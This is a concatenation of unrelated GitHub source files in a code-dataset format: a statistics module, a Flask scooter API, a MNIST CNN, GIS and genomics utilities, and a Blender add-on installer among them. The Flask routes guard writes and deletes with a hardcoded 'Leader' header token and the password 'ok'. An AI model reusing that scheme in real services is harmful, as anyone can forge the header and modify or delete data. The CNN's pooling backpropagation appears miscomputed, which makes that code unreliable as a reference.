quant in quantiles]\n\ndef median(xs):\n \"\"\"Sample median.\"\"\"\n # NOTE: Will be inefficient for large len(xs)\n return quantiles(xs, 0.5)\n\ndef quartiles(xs):\n \"\"\"Divisions between quartiles.\"\"\"\n return quantiles(xs, 0.25, 0.5, 0.75)\n\n\n## Statistical Distributions\n\n# Parameters in Lin approximation\na1 = -0.9911; b1 = 0.8055\na2 = -0.6763; b2 = -1.2451\n\ndef chi_dist(deg, x):\n \"\"\"Returns the cumulative distribution of chi squared up to x.\n Currently, it is an approximation from Lin-1988 \"\"\"\n \n z = sqrt(x) - sqrt(deg)\n \n if z <= 0:\n return 1 - exp(b1 * z + a1 * z**2) / 2\n else:\n return exp(b2 * z + a2 * z**2) / 2\n\ndef chi_inv(deg, p):\n \"\"\"The inverse cumulative distribution of chi squared \n for 'deg' degrees of freedom and 'p' cumulative probability.\n Currently, it is an approximation from Lin-1988 \"\"\"\n \n if p >= 0.5:\n c = -log(2 * (1-p))\n z = (-b1 + sqrt(b1**2 - 4*a1*c)) / (2*a1)\n else:\n c = -log(2 * p)\n z = (-b2 - sqrt(b2**2 - 4*a2*c)) / (2*a2)\n \n return (z + sqrt(deg))**2\n \n\n## Exponential Distribution analysis\n#\n# f(x;m) = 1/m e^{-x/m}\n#\n# if X ~ f(m) then E[X] = m\n# Likewise, the maximum likelihood estimator for m is mean(X's)\n\ndef exp_mean_interval(xs, alpha):\n \"\"\"\n Returns the 100(1-alpha)% confidence interval for the parameter m (the mean) based on data.\n Based on \n \"\"\"\n m_hat = mean(xs) # Maximum likelihood estimator for m\n n = len(xs)\n \n chi_low = chi_inv(2*n, alpha/2) # Lower chi squared parameter\n lower_bound = m_hat * 2*n / chi_low\n \n chi_up = chi_inv(2*n, 1 - alpha/2) # Upper parameter\n upper_bound = m_hat * 2*n / chi_up\n \n return lower_bound, m_hat, upper_bound\n\n\n## Gamma Distribution analysis\n\ndef gamma_mle(xs):\n \"\"\"\n Maximum likelihood estimation for k, theta for a gamma distribution.\n Based on \n \"\"\"\n N = len(xs)\n if N < 1:\n return NaN, NaN\n \n s = math.log(sum(xs)/N) - sum(map(math.log, xs))/N\n if s != 0:\n k_hat = (3 - s + math.sqrt( (s-3)**2 + 24*s )) / (12*s) # Approx mle for k\n else:\n k_hat = NaN\n \n if k_hat != 0:\n theta_hat = sum(xs) / (N * k_hat)\n else:\n theta_hat = NaN\n \n return k_hat, theta_hat\n","repo_name":"Harvard-MolSys-Lab/dynamic-workbench","sub_path":"tools/circuit_compiler/myStat.py","file_name":"myStat.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"74342974914","text":"import requests\nfrom flask import request, jsonify, render_template\nfrom models.database import db\nfrom models.electro_scooter import ElectroScooter\nfrom __main__ import app\nfrom config import node\n\n\n@app.route('/')\ndef get_docs():\n print('sending docs')\n return render_template('swaggerui.html')\n\n\n@app.route('/electro-scooters/', methods=['GET'])\ndef get_electro_scooter_by_id(scooter_id):\n scooter = ElectroScooter.query.get(scooter_id)\n\n if scooter is not None:\n return jsonify({\n \"id\": scooter.id,\n \"name\": scooter.name,\n \"battery_level\": scooter.battery_level\n }), 200\n else:\n return jsonify({\"error\": \"Electro Scooter not found\"}), 404\n\n\n@app.route('/electro-scooters', methods=['GET'])\ndef get_electro_scooters():\n scooters = ElectroScooter.query.all()\n response = {}\n response[\"scooters\"] = []\n\n if len(scooters) != 0:\n for scooter in scooters:\n response[\"scooters\"].append({\n \"id\": scooter.id,\n \"name\": scooter.name,\n \"battery_level\": scooter.battery_level\n })\n return jsonify(response), 200\n\n else:\n return jsonify({\"error\": \"No Electro Scooters in the database\"}), 404\n\n\n@app.route('/electro-scooters', methods=['POST'])\ndef create_electro_scooter():\n headers = dict(request.headers)\n if node.role != 'leader' and (\"Token\" not in headers or headers[\"Token\"] != \"Leader\"):\n return {\n \"message\": \"Access denied!\"\n }, 403\n else:\n try:\n data = request.get_json()\n name = data['name']\n battery_level = data['battery_level']\n electro_scooter = ElectroScooter(name=name, battery_level=battery_level)\n\n db.session.add(electro_scooter)\n db.session.commit()\n\n if node.role == 'leader':\n for follower in node.followers:\n requests.post(f\"http://{follower['host']}:{follower['port']}/electro-scooters\",\n json=request.json,\n headers={\"Token\": \"Leader\"})\n\n return jsonify({\"message\": \"Electro Scooter created successfully\"}), 201\n except KeyError:\n return jsonify({\"error\": \"Invalid request data\"}), 400\n\n\n@app.route('/electro-scooters/', methods=['PUT'])\ndef update_electro_scooter(scooter_id):\n headers = dict(request.headers)\n if node.role != 'leader' and (\"Token\" not in headers or headers[\"Token\"] != \"Leader\"):\n return {\n \"message\": \"Access denied!\"\n }, 403\n else:\n try:\n scooter = ElectroScooter.query.get(scooter_id)\n if scooter is not None:\n data = request.get_json()\n\n scooter.name = data.get('name', scooter.name)\n scooter.battery_level = data.get('battery_level', scooter.battery_level)\n\n db.session.commit()\n\n if node.role == 'leader':\n for follower in node.followers:\n requests.put(f\"http://{follower['host']}:{follower['port']}/electro-scooters/{scooter_id}\",\n json=request.json,\n headers={\"Token\": \"Leader\"})\n\n return jsonify({\"message\": \"Electro Scooter updated successfully\"}), 200\n else:\n return jsonify({\"error\": \"Electro Scooter not found\"}), 404\n except Exception as e:\n return jsonify({\"error\": str(e)}), 500\n\n\n@app.route('/electro-scooters/', methods=['DELETE'])\ndef delete_electro_scooter(scooter_id):\n headers = dict(request.headers)\n if node.role != 'leader' and (\"Token\" not in headers or headers[\"Token\"] != \"Leader\"):\n return {\n \"message\": \"Access denied!\"\n }, 403\n else:\n try:\n scooter = ElectroScooter.query.get(scooter_id)\n if scooter is not None:\n password = request.headers.get('Delete-Password')\n\n if password == 'ok':\n db.session.delete(scooter)\n db.session.commit()\n\n if node.role == 'leader':\n for follower in node.followers:\n requests.delete(f\"http://{follower['host']}:{follower['port']}/electro-scooters/{scooter_id}\",\n headers={\"Token\": \"Leader\", \"Delete-Password\": \"ok\"})\n\n return jsonify({\"message\": \"Electro Scooter deleted successfully\"}), 200\n else:\n return jsonify({\"error\": \"Incorrect password\"}), 401\n else:\n return jsonify({\"error\": \"Electro Scooter not found\"}), 404\n except Exception as e:\n return jsonify({\"error\": str(e)}), 500\n","repo_name":"LY-MC/PR_labs","sub_path":"lab8/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21926979764","text":"from typing import Optional\n\nfrom procedures.examination import is_divided\nfrom structures.graph import Tile, CardinalDirection, Wall\nfrom structures.manager import GeometricTileManager\nfrom structures.navigation import InteriorWallNeighbourhood\n\n\"\"\"\nBasic navigation procedures related to user actions (like changing window focus).\nNot to be confused with the selection module/file, which determines actionable regions for the purpose of manipulations.\n\"\"\"\ndef next_tile(manager: GeometricTileManager, initial: Tile, direction: CardinalDirection) -> Optional[Tile]:\n \"\"\"\n When multiple options are available, option furthest towards the top-left/bottom-right corner will be taken, depend on which corner the input direction faces.\n - This maximises the likelihood that reversing a navigation will reach the previous Tile.\n \"\"\"\n\n candidates = manager.settings.static_config.navigation.tile_neighbourhood(initial)[direction]\n\n if len(candidates) == 0:\n return None\n else:\n return manager.settings.static_config.navigation.tiebreaker(candidates)\n\n\ndef next_undivided_tile(manager: GeometricTileManager, initial: Tile, direction: CardinalDirection) -> Optional[Tile]:\n \"\"\"\n This variant is limited to Tiles whose corners are all each other's nearest neighbours (all tiles, but only empty walls).\n - This matches the most common conditions for focusable content in tiling window managers.\n\n When multiple options are available, option furthest towards the top-left/bottom-right corner will be taken, depend on which corner the input direction faces.\n -This maximises the likelihood that reversing a navigation will reach the previous Tile.\n \"\"\"\n result = next_tile(manager, initial, direction)\n\n if result is None:\n return None\n\n if not initial.is_sentinel and result.is_sentinel:\n #this means we are moving from a Window to find its containing wall, so we want to skip to the next wall, if any\n result = next_tile(manager, result, direction)\n\n if result is None:\n return None\n\n #isinstance actually makes more sense that is_sentinel here\n if isinstance(result, Wall) and is_divided(result):\n candidates = InteriorWallNeighbourhood(result)[direction]\n result = manager.settings.static_config.navigation.tiebreaker(candidates)\n\n return result\n\n","repo_name":"MarcosCosmos/geometric-tile-manager","sub_path":"procedures/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72489842754","text":"import sys\ninput = sys.stdin.readline\n\n# 파싱\nn, m = map(int, input().split())\nnums = list(map(int, input().split()))\n\n# 나머지\nremain = [0 for _ in range(m)]\nnums[0] %= m\nremain[nums[0]] += 1\n\n# 누적합 및 나머지 처리\nfor i in range(1, n):\n nums[i] = (nums[i] + nums[i - 1]) % m\n remain[nums[i]] += 1\n\n# nCr 갯수 반환 함수\ndef com(n, r):\n if r < 0 or n < r:\n return 0\n temp = 1\n for i in range(n, n - r, -1):\n temp *= i\n for i in range(1, r + 1):\n temp = temp // i\n return temp\n\n# 갯수 체크\ncount = remain[0]\nfor i in range(m):\n count += com(remain[i], 2)\n\n# 결과 출력\nprint(count)\n","repo_name":"Lairin-pdj/coding_test","sub_path":"baekjoon/10986_나머지 합.py","file_name":"10986_나머지 합.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39611451262","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef display_image(image):\n plt.imshow(image, cmap=\"Greys\")\n plt.show()\n\nclass NN:\n def __init__(self, in_width, in_height, filter_width, filter_height, no_filters, pool_width, pool_height, output_size):\n self.input_size = (in_width, in_height)\n self.l1_size = (no_filters, in_height - filter_height + 1, in_width - filter_width + 1)\n\n assert (self.l1_size[2] % pool_width) == 0\n assert (self.l1_size[1] % pool_height) == 0\n \n self.p_size = (no_filters, self.l1_size[1]//pool_height, self.l1_size[2]//pool_width)\n self.filters = np.zeros([no_filters, filter_height, filter_width])\n self.filter_width = filter_width \n self.filter_height = filter_height\n self.no_filters = no_filters\n self.pool_width = pool_width\n self.pool_height = pool_height\n self.weight_length = self.p_size[0] * self.p_size[1] * self.p_size[2]\n self.weights = np.zeros([output_size, self.weight_length])\n self.bias = np.ones([output_size])\n self.output_size = output_size\n\n def load_model(self, path):\n with open(path, \"r\") as file:\n raw = file.read()\n nn_values = json.loads(raw)\n self.filters = np.array(nn_values[\"filters\"])\n self.weights = np.array(nn_values[\"weights\"])\n self.bias = np.array(nn_values[\"bias\"])\n self.p_size = nn_values[\"p_size\"]\n self.filter_width = nn_values[\"filter_width\"]\n self.filter_height = nn_values[\"filter_height\"]\n self.no_filters = nn_values[\"no_filters\"]\n self.pool_width = nn_values[\"pool_width\"]\n self.pool_height = nn_values[\"pool_height\"]\n self.weight_length = nn_values[\"weight_length\"]\n self.output_size = nn_values[\"output_size\"]\n\n def save_model(self, path):\n with open(path, \"w\") as file:\n nn_values = dict()\n nn_values[\"filters\"] = self.filters.tolist()\n nn_values[\"weights\"] = self.weights.tolist()\n nn_values[\"bias\"] = self.bias.tolist()\n nn_values[\"p_size\"] = self.p_size \n nn_values[\"filter_width\"] = self.filter_width \n nn_values[\"filter_height\"] = self.filter_height \n nn_values[\"no_filters\"] = self.no_filters\n nn_values[\"pool_width\"] = self.pool_width \n nn_values[\"pool_height\"] = self.pool_height\n nn_values[\"weight_length\"] = self.weight_length\n nn_values[\"output_size\"] = self.output_size\n raw = json.dumps(nn_values)\n file.write(raw)\n\n def set_filters(self, filters):\n assert len(filters) == self.no_filters\n assert len(filters[0]) == self.filter_height\n assert len(filters[0,0]) == self.filter_width\n self.filters = filters\n\n def xavier_init(self):\n weights = np.random.randn(self.output_size, self.weight_length) / self.weight_length\n self.weights = weights\n return weights\n\n def convolute(self, image):\n assert len(image) == self.input_size[0]\n assert len(image[0]) == self.input_size[1]\n\n first_layer = np.zeros(self.l1_size)\n for i, filter in enumerate(self.filters):\n for j in range(self.l1_size[1]):\n for k in range(self.l1_size[2]):\n t = np.tensordot(image[j:j+self.filter_width, k:k+self.filter_height], filter)\n first_layer[i,j,k] = t\n \n self.l1_cache = first_layer[:]\n return first_layer\n\n def pool(self, first_layer):\n pooled = np.zeros(self.p_size)\n for i in range(self.no_filters):\n for j in range(0, self.l1_size[1], self.pool_width):\n for k in range(0, self.l1_size[2], self.pool_height):\n pooled[i,j//self.pool_width,k//self.pool_height] = first_layer[i,j:j+self.pool_height,k:k+self.pool_width].max()\n self.p_cache = pooled\n return pooled\n\n def ff(self, ff_in):\n ff_out = np.zeros(self.output_size)\n flat = ff_in.flatten()\n self.flat_cache = flat\n for i in range(self.output_size):\n ff_out[i] = np.dot(self.weights[i], flat) + self.bias[i]\n self.ff_cache = ff_out\n return ff_out\n\n def soft_max(self, ff_out):\n exps = np.exp(ff_out.astype(np.longdouble))\n exp_sum = np.sum(exps)\n self.output = exps/exp_sum\n return self.output\n\n def feed_forward(self, image, debug=False):\n if debug:\n display_image(image)\n l1 = self.convolute(image)\n if debug:\n for i in l1:\n print(i)\n display_image(i)\n p = self.pool(l1)\n if debug:\n for i in p:\n display_image(i)\n ff_out = self.ff(p)\n if debug:\n print(ff_out)\n predict = self.soft_max(ff_out)\n if debug:\n print(predict)\n return predict\n\n # dL_dout, change in loss in relation to the change in output\n def xel_backprop(self, predict, correct):\n dL_dout = np.zeros([self.output_size])\n dL_dout[correct] = -1/predict[correct]\n self.dL_dout_cache = dL_dout\n return dL_dout\n\n # dout_dt, change in output in relation to change in pre_softmax totals\n def soft_max_backprop(self, ts, c):\n dout_dt = np.zeros([self.output_size])\n t_exp = np.exp(ts.astype(np.longdouble))\n S = np.sum(t_exp)\n\n dout_dt = -t_exp[c] * t_exp / (S ** 2)\n dout_dt[c] = t_exp[c] * (S - t_exp[c]) / (S ** 2)\n \n return dout_dt\n\n def ff_backprop(self, dL_dout, dout_dt):\n dt_dw = self.flat_cache # 676 x 1\n dt_db = 1\n dt_dflat = self.weights # 10 x 676\n dL_dt = np.multiply(dL_dout, dout_dt) # 10 x 1\n \n dL_dw = np.zeros(self.weights.shape) # 10 x 676 \n dL_db = np.zeros(self.output_size) # 10 x 1\n dL_dflat = np.zeros(self.flat_cache.shape) # 676 x 1\n\n dL_db = dL_dt * dt_db\n dL_dflat = dL_dt @ dt_dflat\n dL_dw = np.outer(dL_dt, dt_dw)\n return (dL_db, dL_dflat, dL_dw)\n\n def pool_backprop(self, dL_dflat):\n dL_da1 = np.zeros(self.l1_cache.shape)\n for i in range(self.no_filters):\n for j in range(0, self.l1_size[1], self.pool_width):\n for k in range(0, self.l1_size[2], self.pool_height):\n max_pos = self.l1_cache[i, j:j+self.pool_height,k:k+self.pool_width].argmax()\n max_y = j + max_pos//self.pool_height\n max_x = k + max_pos%self.pool_width\n dL_da1[i, max_y, max_x] = dL_dflat[i+j+k]\n return dL_da1\n\n def conv_backprop(self, image, dL_da1):\n dL_dfilters = np.zeros(self.filters.shape)\n for i in range(self.no_filters):\n for y in range(self.filter_height):\n for x in range(self.filter_width):\n dL_dfilters[i,y,x] = (\n image[\n y:self.input_size[1] - self.filter_height + y + 1, \n x:self.input_size[0] - self.filter_width + x + 1\n ] * dL_da1[i] ).sum()\n return dL_dfilters\n\n def back_prop(self, image, predict, correct, rate):\n dL_dout = self.xel_backprop(predict, correct)\n dout_dt = self.soft_max_backprop(self.ff_cache, correct)\n dL_db, dL_dflat, dL_dw = self.ff_backprop(dL_dout, dout_dt)\n self.dL_dw_cache = dL_dw\n self.dL_db_cache = dL_db\n self.weights -= rate * dL_dw\n self.bias -= rate * dL_db\n dL_da1 = self.pool_backprop(dL_dflat)\n dL_dfilters = self.conv_backprop(image, dL_da1)\n self.filters -= rate * dL_dfilters\n\n def train(self, images, labels, rate, early_stop = 0):\n total, epoch_correct, epoch_loss = 0, 0, 0\n for i, (image, label) in enumerate(zip(images, labels)):\n total += 1\n predict = self.feed_forward(image)\n if np.argmax(predict) == label:\n epoch_correct += 1\n epoch_loss += -np.log(predict[label])\n self.back_prop(image, predict, label, rate)\n\n\n if i % 100 == 99:\n print(f\"[Step {total}] Past 100 steps: Avg. Loss {epoch_loss/100} | Accuracy: {epoch_correct}%\")\n epoch_correct = 0\n if epoch_loss < early_stop:\n print(epoch_loss)\n return\n epoch_loss = 0\n\n def test(self, images, labels):\n total, total_correct, epoch_correct, epoch_loss, total_loss = 0, 0, 0, 0, 0\n digit_acc = [0] * 10\n for i, (image, label) in enumerate(zip(images, labels)):\n total += 1\n predict = self.feed_forward(image)\n if np.argmax(predict) == label:\n epoch_correct += 1\n total_correct += 1\n digit_acc[int(label)] += 1\n loss = -np.log(predict[int(label)])\n epoch_loss += loss\n total_loss += loss\n\n if i % 100 == 99:\n print(f\"[Step {total}] Past 100 steps: Avg. Loss {epoch_loss/100} | Accuracy: {epoch_correct}%\")\n epoch_correct = 0\n epoch_loss = 0\n print(f\"[Test Results] All 10000 test steps: Avg. Loss {total_loss/len(images)} | Accuracy: {100*total_correct/len(images):.2f}%\")\n \n names, totals = np.unique(labels, return_counts=True)\n values = digit_acc/totals\n sns.set_theme()\n ax = sns.barplot(names, values)\n ax.bar_label(ax.containers[0])\n plt.ylim(0,1)\n plt.title(\"Accuracy of prediction of each digit\")\n plt.show()\n","repo_name":"DavidKing4/MNISTCNN","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31744575925","text":"#!/usr/bin/env python3\nimport csv\nimport random\n\nwith open (\"/Users/eren/SchoolScripts/users.csv\", 'r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n next(csv_reader)\n\n for line in csv_reader:\n # randomlist = random.sample(range(0, 5), 2)\n # number = str(randomlist[0])+str(randomlist[1])+str(sum(randomlist)) + str(randomlist[1]) + str(randomlist[0]) # Generate Random number for each user.\n printUserEmail = f'{line[\"name.givenName\"]}'\n\n # print(printUserEmail)\n \n # print(f'gam update user {line[\"primaryEmail\"]} password') # Update user mail and password\n # print(f\"gam update group {line['group']} add member {line['e-mail']\") # Update user group\n # print(f'gam update user {line[0]} password {line[0][0:3]}'+'12345')\n # print(f'{line[0]}')\n # print(f'{line[0][0:3]}'+'12345')\n # print(f'{line[0]} -- {line[0][0:3]}'+'12345') # For Teacher\n\n\n\n\n# gam update group samplegroup add member student1@bascs.org\n# gam update user c1 password password12","repo_name":"qreceperen/SchoolScripts","sub_path":"gamCreateEmailCheckDuplicate.py","file_name":"gamCreateEmailCheckDuplicate.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"933100720","text":"__author__ = 'Alexander Bruy'\n__date__ = 'October 2013'\n__copyright__ = '(C) 2013, Alexander Bruy'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport locale\n\nfrom PyQt4.QtCore import *\n\nfrom qgis.core import *\n\n\ndef getPolygonLayerNames():\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n layerNames = []\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.VectorLayer \\\n and layer.geometryType() == QGis.Polygon:\n layerNames.append(unicode(layer.name()))\n return sorted(layerNames, cmp=locale.strcoll)\n\n\ndef getRasterLayerNames():\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n layerNames = []\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.RasterLayer \\\n and layer.providerType() == 'gdal':\n layerNames.append(unicode(layer.name()))\n return sorted(layerNames, cmp=locale.strcoll)\n\n\ndef getVectorLayerByName(layerName):\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.VectorLayer \\\n and layer.name() == layerName:\n if layer.isValid():\n return layer\n else:\n return None\n\n\ndef getRasterLayerByName(layerName):\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.RasterLayer \\\n and layer.name() == layerName \\\n and layer.providerType() == 'gdal':\n if layer.isValid():\n return layer\n else:\n return None\n\n\ndef mapToPixel(mX, mY, geoTransform):\n if geoTransform[2] + geoTransform[4] == 0:\n pX = (mX - geoTransform[0]) / geoTransform[1]\n pY = (mY - geoTransform[3]) / geoTransform[5]\n else:\n (pX, pY) = applyGeoTransform(mX, mY, invertGeoTransform(geoTransform))\n return (int(pX), int(pY))\n\n\ndef pixelToMap(pX, pY, geoTransform):\n (mX, mY) = applyGeoTransform(pX + 0.5, pY + 0.5, geoTransform)\n return (mX, mY)\n\n\ndef applyGeoTransform(inX, inY, geoTransform):\n outX = geoTransform[0] + inX * geoTransform[1] + inY * geoTransform[2]\n outY = geoTransform[3] + inX * geoTransform[4] + inY * geoTransform[5]\n return (outX, outY)\n\n\ndef invertGeoTransform(geoTransform):\n det = geoTransform[1] * geoTransform[5] - geoTransform[2] * geoTransform[4]\n\n if abs(det) < 0.000000000000001:\n return\n\n invDet = 1.0 / det\n\n outGeoTransform = [0, 0, 0, 0, 0, 0]\n outGeoTransform[1] = geoTransform[5] * invDet\n outGeoTransform[4] = -geoTransform[4] * invDet\n\n outGeoTransform[2] = -geoTransform[2] * invDet\n outGeoTransform[5] = geoTransform[1] * invDet\n\n outGeoTransform[0] = (geoTransform[2] * geoTransform[3] - geoTransform[0]\n * geoTransform[5]) * invDet\n outGeoTransform[3] = (-geoTransform[1] * geoTransform[3] + geoTransform[0]\n * geoTransform[4]) * invDet\n\n return outGeoTransform\n","repo_name":"mlt/hypsometry","sub_path":"hypsometryutils.py","file_name":"hypsometryutils.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33916398596","text":"# load desired font for the poster\nimport matplotlib.font_manager as fm\n\ndef findFont(name='Arial'):\n possiblefonts = fm.findSystemFonts()\n return [f for f in possiblefonts if name in f]\nprop = fm.FontProperties(fname='Arial.ttf')\n\n# set the font to that font\nimport matplotlib\nmatplotlib.rcParams['font.family'] = prop.get_name()\n\n# import various tools\nimport glob, os\nimport matplotlib.pyplot as plt, imageio, numpy as np\nfrom PIL import Image\n\ndef poster(string='Missing Person Poster', filename='missing.jpg',\n size=(4.62, 6.93), margin=0, dpi=100):\n\n # define some scales\n xsize = float(size[0])\n ysize = float(size[1])\n aspect = ysize/xsize\n\n # load the image\n image = imageio.imread(filename)\n \n # create the plot\n plt.figure('poster', figsize=size, dpi=dpi)\n a = plt.subplot()\n a.cla()\n plt.setp(a.get_xticklabels(), visible=False)\n plt.setp(a.get_xticklines(), visible=False)\n plt.setp(a.get_yticklabels(), visible=False)\n plt.setp(a.get_yticklines(), visible=False)\n plt.subplots_adjust(left=margin/xsize, right=1.0 - margin/xsize, top=1.0 - margin/ysize, bottom=margin/ysize)\n\n # draw the background image\n a.imshow(image, interpolation='nearest', extent=[0, xsize, 0, ysize])\n\n name = input(\"Enter name of the missing person: \")\n contact = input(\"Enter the name of contact if the missing person is found: \")\n contact = 'PLEASE CONTACT ' + contact + ' IF FOUND'\n contact_nmbr = input(\"Enter contact number: \")\n contact_nmbr = 'Phone Number: +91-' + contact_nmbr\n age = input(\"Age of missing person: \")\n age = 'Age = ' + age\n height = input(\"Height of missing person: \")\n height = 'Height = ' + height\n weight = input(\"Weight of missing person: \")\n weight = 'Weight = ' + weight\n last_seen_location = input(\"Missing person last seen location: \")\n last_seen_location = 'Last seen Location = ' + last_seen_location\n profile_pic = input(\"Enter the name of the image of Missing person: \")\n\n a.text(2.31, 1.4, name.upper(), fontsize=20, ha='center', weight='bold', color='red')\n a.text(2.31, 0.5, contact.upper(), fontsize=12, ha='center', weight='bold', color='orangered')\n a.text(2.31, 0.35, contact_nmbr.upper(), fontsize=12, color='orangered', ha='center', weight='bold', va='top')\n a.text(2.31, 0.95, last_seen_location, fontsize=10, color='black', ha='center', weight='bold')\n a.text(2.31, 1.15, age + ' | ' + height + ' | ' + weight, fontsize=10, color='black', ha='center', weight='bold') \n \n filename = string.replace(' ', '').replace('\\n','') + '.png'\n print(\"Saving poster as\", filename)\n plt.savefig(filename)\n plt.draw()\n \n img = Image.open(profile_pic).convert(\"RGBA\")\n img = img.resize((320, 331), Image.ANTIALIAS)\n background = Image.open(\"MissingPersonPoster.png\").convert(\"RGBA\")\n background.paste(img, (71, 166), img)\n background.save('MissingPersonPoster.png',\"PNG\")\n\nposter()","repo_name":"kaustubh2708/Find-Missing-Person","sub_path":"Missing Person Poster/poster.py","file_name":"poster.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29600161724","text":"import argparse\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser('Sample Extraction from multisample VCF')\n\n\tparser.add_argument('-i','--vcf',help=\"input vcf file\")\n\tparser.add_argument('-s','--samplename',help=\"sample to extract\")\n\tparser.add_argument('-o','--out',help=\"output file\")\n\n\tglobal opts\n\n\topts = parser.parse_args()\n\n\tvcf = open(opts.vcf,'r')\n\tout = open(opts.out,'w')\n\n\t\n\tfor line in vcf:\n\n\t\tline = line.rstrip()\n\t\tif line.startswith('##'):\n\n\t\t\tout.write(line +'\\n')\n\t\telif line.startswith('#CHROM'):\n\t\t\theader = line.split('\\t')\n\t\t\t\n\t\t\ttry:\n\t\t\t\tsample_header = '\\t'.join(header[:9] + [opts.samplename])\n\t\t\t\tout.write(sample_header +'\\n')\n\t\t\texcept Exception as E:\n\t\t\t\tprint('error: ' + line)\n\t\t\t\traise\n\t\telse:\n\t\t\tvar = line.split('\\t')[:9]\n\t\t\ttry:\n\t\t\t\tsample = line.split('\\t')[header.index(opts.samplename)]\n\t\t\t\tvar = '\\t'.join(var[:9] + [sample])\n\t\t\t\tif sample.startswith('0/0'):\n\t\t\t\t\tcontinue\n\t\t\t\tout.write(var +'\\n')\n\t\t\texcept Exception as E:\n\t\t\t\tprint('error: ' + line)\n\t\t\t\traise\n\tvcf.close()\n\tout.close()\t","repo_name":"urtism/Powercall","sub_path":"scripts/VCF_filter_by_sample.py","file_name":"VCF_filter_by_sample.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72566381954","text":"from vp_detection import VPDetection\r\nimport cv2\r\nimport os\r\nimport matplotlib.pyplot as plt\r\npath='C:/Users/SamSung/Desktop/uni/y4/computer_vision/FD_Item/'\r\nl=os.listdir(path)\r\n#print(l)\r\nfl1=3.42*1000\r\nfl2=3.4082*1000\r\n\r\n# ith image i\r\ni=7\r\n#print(os.listdir(path))\r\n\r\nvp=VPDetection(length_thresh=30,principal_point=None,focal_length=fl1,seed=None)\r\n\r\nimg_path=os.path.join(path,l[i])\r\nimg=cv2.imread(img_path)\r\n\r\nprint('3D space coord:\\n',vp.find_vps(img))\r\nvps_2D=vp.vps_2D\r\nprint('2D image coord:\\n',vps_2D)\r\nx=[j[0] for j in vps_2D]\r\ny=[j[1] for j in vps_2D]\r\n\r\nplt.scatter(x,y,s=6)\r\n\r\nplt.imshow(img)\r\n\r\nplt.show()\r\n","repo_name":"bm43/4th-year-projects","sub_path":"computer_vision/vp.py","file_name":"vp.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34219991870","text":"import bpy_extras\nimport platform\nimport sys\nimport bpy\nimport numpy as np\nimport torch\nimport PIL\nimport ssl\nimport os\n\nfrom torch import optim\nfrom torchvision import models, transforms\nfrom time import time\nfrom itertools import chain\nfrom PIL import Image as Img\nfrom bpy.types import Operator, Image\n\nwm = bpy.context.window_manager\nstr_path = \"my_path\"\n\n# execute terminal command and return output\ndef exec(cmd):\n stream = os.popen(cmd)\n output = stream.read()\n print(output)\n\n# install required packages for windows\ndef config_windows():\n print(\"Windows Config\")\n # command(\"\\\"\" + os.path.join(sys.exec_prefix,\n # \"bin\\python.exe\") + \"\\\"\" + \" -m ensurepip\")\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin\\python.exe\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"\\\\\" + \"blender-pytorch-style-transfer\\\\windows\" + \"\\\\\" + \"torch-1.5.0-cp37-cp37m-win_amd64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin\\python.exe\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"\\\\\" + \"blender-pytorch-style-transfer\\\\windows\" + \"\\\\\" + \"torchvision-0.6.0-cp37-cp37m-win_amd64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin\\python.exe\") + \"\\\"\" + \" -m pip install Pillow --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n# install required packages for linux\ndef config_linux():\n print(\"Linux Config\")\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m ensurepip --user\"\n exec(command)\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + 